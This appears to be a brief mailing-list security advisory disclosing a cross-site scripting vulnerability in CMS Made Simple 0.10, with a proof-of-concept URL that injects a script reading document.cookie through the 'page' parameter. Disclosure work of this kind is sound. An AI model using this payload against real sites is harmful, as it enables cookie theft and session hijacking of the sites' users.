<<< Date Index >>>     <<< Thread Index >>>

CMS Made Simple 0.10 is susceptible to a cross site scripting attack.



[Description]: CMS lets you update your pages and keep the content on a static 
page that will
                not become stale regardless of how much other content gets 
placed on your site


[version]:CMS Made Simple 0.10

[vendor]:http://www.cmsmadesimple.org

[Vulnerability]: cross site script

[exploit]:
http://[host]/[cms]/index.php?page=<script>alert(document.cookie);</script>
 
.......[X1NG]..........
X1ngBox <at/> Gmail Com